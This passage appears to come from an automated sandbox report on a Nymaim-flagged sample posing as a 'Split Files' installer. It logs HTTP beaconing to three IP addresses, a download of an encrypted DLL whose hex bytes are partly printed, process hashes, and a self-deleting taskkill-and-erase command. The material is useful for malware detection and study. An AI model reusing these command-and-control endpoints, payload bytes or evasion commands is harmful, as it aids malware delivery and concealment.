Jan 5, 2023 08:47:26.443020105 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:28.517307997 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:28.544837952 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:28.903182030 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:28.903363943 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:30.978315115 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:31.005625010 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:31.374718904 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:31.374835014 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:33.465759993 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:33.493500948 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:33.858603001 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:33.858731031 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:36.415440083 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:36.443062067 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:36.810410976 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:36.812172890 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:40.281857967 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:40.281939983 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:40.282066107 CET	49707	80	192.168.2.5	171.22.30.106

HTTP Request Dependency Graph

45.139.105.171

107.182.129.235

171.22.30.106

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49705	45.139.105.171	80	C:\Program Files (x86)\Split Files\SplitFiles131.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 08:47:09.800462008 CET	93	OUT	GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 45.139.105.171 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:09.836986065 CET	93	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49706	107.182.129.235	80	C:\Program Files (x86)\Split Files\SplitFiles131.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 08:47:09.925610065 CET	94	OUT	GET /storage/ping.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 0 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:09.952980042 CET	94	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 17 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55 Data Ascii: UwUoooIIrwgh24uuU
Jan 5, 2023 08:47:09.990287066 CET	95	OUT	GET /storage/extension.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:10.017687082 CET	96	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Transfer-Encoding: binary Content-Length: 94224 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00 Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq\|2iR2WFC=MUH6A@OcMx8L- b\|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(PJ#:ISD}vjK9LQF
Jan 5, 2023 08:47:10.017736912 CET	98	IN	Data Raw: 6f 4f 68 56 80 cb c2 29 e2 a1 68 c5 76 5e 2d 04 d2 46 81 ff 08 3c 8f 84 16 ba bb 56 68 88 31 b9 c0 b3 d7 21 97 b1 05 21 8b c0 0f 42 59 63 04 9a 43 3f 8b f4 44 32 04 a3 b3 c2 c1 32 d5 4b 28 a2 a0 36 f6 19 9a 1b 42 d5 15 bd 92 44 90 aa 61 79 b9 b8 Data Ascii: oOhV)hv^-F<Vh1!!BYcC?D22K(6BDay=\|'[1~YB:/A`=FKqTw-blBC:>e5.jNK=ZGj:V.:gP~tm~ "A1jNR[PX~LgT%
Jan 5, 2023 08:47:10.017781973 CET	99	IN	Data Raw: 20 2f b2 fc fb 3b 22 62 e0 b2 2f c2 80 40 84 cb 02 1f 37 3d 0d 0c 1a 55 11 be 34 89 65 ce bc 3a 9c 5c 05 87 3d bb e8 1a 84 38 46 23 32 4d fc be ea 80 62 5b 19 72 10 35 1e b7 8a 98 4d a2 eb 87 6c 74 d4 1d e4 9d 35 68 f5 a9 e5 08 ea 2b 4d 6b 11 a1 Data Ascii: /;"b/@7=U4e:\=8F#2Mb[r5Mlt5h+Mk>eOk6wB!mMf@yHW0>GX\|2";J=MgPAqTW/j*qO}([=\|Dltn3)fF@}Mr
Jan 5, 2023 08:47:10.017816067 CET	100	IN	Data Raw: a7 85 09 11 e8 87 fa 45 9c 6e e3 22 3a 8b 3a 37 cb 18 c6 c9 0c 95 19 a5 fd b0 6a 49 fe 1b fe ae 5a 87 a0 39 48 bd 07 52 c2 4c a3 6c d5 9e 43 04 16 b3 be ff 0d 7e 75 6b 76 df 83 39 76 49 20 81 05 f4 44 2b 77 e4 4d b2 06 16 49 eb 4f 6e 06 26 32 98 Data Ascii: En"::7jIZ9HRLlC~ukv9vI D+wMIOn&2wSCi-Mxyi=&{32cT[\wc70#q6F=hbB4P\U8BOpw0IZdET,.k]N{S!d*$;q,
Jan 5, 2023 08:47:10.017849922 CET	102	IN	Data Raw: 4d 96 87 7f 63 be 6a e0 a7 12 2c 76 97 11 b2 61 1a 8c 52 86 70 00 11 79 15 ef 90 33 7a 8b 69 b8 d1 93 89 5d 20 a4 63 5d de 1c 51 fe 73 46 db 21 4d c9 ea f7 67 60 2f e1 a9 04 18 e8 c1 d7 b3 44 78 0e 75 21 3a 8b 07 a0 01 19 e6 77 51 13 23 87 dc 93 Data Ascii: Mcj,vaRpy3zi] c]QsF!Mg`/Dxu!:wQ#[Xs~w0)w(cU6@(R#a0Sj!P[N^/c&;<5`V(Tys6gMn ?.Vz]X6?hGynK;YVYK
Jan 5, 2023 08:47:10.017884970 CET	103	IN	Data Raw: 21 b9 4c 3c 58 1f 3e b0 46 f6 ca 4f d4 3b 5d 88 04 a1 eb 28 78 da b0 51 20 02 9f d0 8e b2 b6 6e de 77 3f 8e 24 81 58 61 dc f1 2f 50 d4 78 14 e3 ed 48 fd 34 28 b3 3c 8d c4 b1 fb b3 81 1a a3 cc 05 30 f2 1b f9 e2 ee 54 f2 cb e6 99 0e 52 e0 62 83 e1 Data Ascii: !L<X>FO;](xQ nw?$Xa/PxH4(<0TRbY\|/V)s8igrzEm<G_+/G.t#\|1;'Ui9yQYXP^^8]7_Y(*Mt%k+p.(zg
Jan 5, 2023 08:47:10.017935991 CET	104	IN	Data Raw: 68 3c a5 e0 8c 19 ff b7 b6 66 fd 50 d8 d9 59 25 6f 43 24 25 d2 09 74 d5 15 b3 3e 2c 54 69 50 e7 2e cc 3b db c1 ab f1 19 b7 ff f3 7e 50 4b 36 6e 85 9a 1e 0e d4 5d 9f a5 ae ce 78 88 33 b5 ca 41 3d a1 fd 67 c3 9e 53 a3 30 2c b4 41 90 66 8e 73 85 77 Data Ascii: h<fPY%oC$%t>,TiP.;~PK6n]x3A=gS0,Afswy\cCDw6m&g}fom?ZIhA/-'1D8$$@S9&h0a7lLl 9Wyu0
Jan 5, 2023 08:47:10.017983913 CET	106	IN	Data Raw: 24 ad 2e af 1c 5c fa b9 f9 cf 44 8d d0 e8 a4 24 09 87 fb a0 14 ac b1 57 7d 53 55 c3 8d 9b d7 93 44 32 17 30 78 13 2a 5a 0b e8 52 6e 89 17 ad ea 8f 4a 5f d2 cb 2f 97 d7 ed f3 95 a9 50 7f 49 f6 6f 84 95 c0 12 8d 28 dd a7 d0 4c 02 91 fe 7f 5a bd 70 Data Ascii: $.\D$W}SUD20x*ZRnJ_/PIo(LZp1+,j%MClj5NZ32Pu0'1b}V}JCC;H@mX`5Xgw[iag7X"G{K
Jan 5, 2023 08:47:10.018032074 CET	107	IN	Data Raw: d9 c8 d5 72 52 2b 1f a9 ce 14 25 d2 bc be a1 c8 e3 db 90 60 1d e7 64 da 5b 9b 91 87 b9 96 91 4c f6 68 b8 24 66 6d 17 12 16 9b ce c1 4d ad 21 e8 ac e7 91 d6 2b 8a 70 d8 07 6d f6 7c 51 aa ae 5c 46 a3 5b a8 63 78 5a 2f b7 91 d6 fb a1 2d a8 64 d9 d7 Data Ascii: rR+%`d[Lh$fmM!+pm\|Q\F[cxZ/-dIa_hYwOi@{c5$:u[x{'B4oXa\H_f$%^gZr~Q> F>!<}Nw^~a\"[T/B&
Jan 5, 2023 08:47:10.018080950 CET	108	IN	Data Raw: 20 4c ba 5f 6e 12 80 56 cf 7a 46 07 bc 39 50 89 7d 09 31 b0 10 e3 35 18 30 d6 9b 45 e7 53 0e 8b 5a 89 04 ed 1f 63 58 26 ed 05 56 f6 04 b0 4b 49 41 ec 72 6f 33 13 31 cb 04 d8 ae a2 60 68 7a 07 c2 58 2d 03 77 38 4e e5 40 a5 1d e8 35 b1 0b 06 8e e7 Data Ascii: L_nVzF9P}150ESZcX&VKIAro31`hzX-w8N@5Yf8w}-^)Eja.] )jKNb$Etb6k@+P/zksThrw^NWchEZX(E\8J9alG/Cm-Q95Q@J1_lHl
Jan 5, 2023 08:47:10.045037031 CET	110	IN	Data Raw: df 45 f8 57 13 1c bc db 95 00 23 48 83 a9 9d cc 72 58 44 3a 28 86 1f 1a ff f8 b0 74 76 a4 81 88 29 df fd 47 64 5f 13 3c 75 e5 f1 4c fe d9 14 bc 60 1b ac a3 1b 17 61 a9 b7 fa 7f c7 86 61 d6 5f f0 b1 f3 ff 55 3d 50 be ad 32 1d c1 19 a0 b5 56 32 5f Data Ascii: EW#HrXD:(tv)Gd_<uL`aa_U=P2V2_bFM{!wahJs m<'Js{>vB;C+M]5r4:kRP:OjQUFLDQKp+CNZ!cQ:*V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49707	171.22.30.106	80	C:\Program Files (x86)\Split Files\SplitFiles131.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 08:47:10.184628010 CET	196	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:10.635227919 CET	196	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:12.711500883 CET	197	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:13.094685078 CET	197	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:15.194849014 CET	198	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:15.582741022 CET	198	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:18.399646997 CET	199	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:18.811140060 CET	199	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:20.899158001 CET	200	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:21.282871008 CET	200	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:23.423401117 CET	200	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:23.864329100 CET	201	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:25.946579933 CET	201	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:26.442823887 CET	201	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:28.517307997 CET	202	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:28.903182030 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:30.978315115 CET	203	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:31.374718904 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:33.465759993 CET	204	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:33.858603001 CET	204	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 5, 2023 08:47:36.415440083 CET	204	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Jan 5, 2023 08:47:36.810410976 CET	205	IN	HTTP/1.1 200 OK Date: Thu, 05 Jan 2023 07:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Target ID:	1
Start time:	08:47:00
Start date:	05/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	2094367 bytes
MD5 hash:	E0F8085C7CB8EB9CF1C263BB12CFC6DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	4
Start time:	08:47:01
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
Imagebase:	0x400000
File size:	778752 bytes
MD5 hash:	E8176050192FBB976D70238E3C121F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	5
Start time:	08:47:04
Start date:	05/01/2023
Path:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Imagebase:	0x400000
File size:	3491315 bytes
MD5 hash:	361518D6CC3C25EEC2DFC1DE82B055B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	08:47:08
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x100000
File size:	73728 bytes
MD5 hash:	3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	08:47:39
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	08:47:39
Start date:	05/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	08:47:39
Start date:	05/01/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "SplitFiles131.exe" /f
Imagebase:	0xf40000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	1454
Total number of Limit Nodes:	16

Executed Functions

Function 00409764 Relevance: 7.6, APIs: 5, Instructions: 78
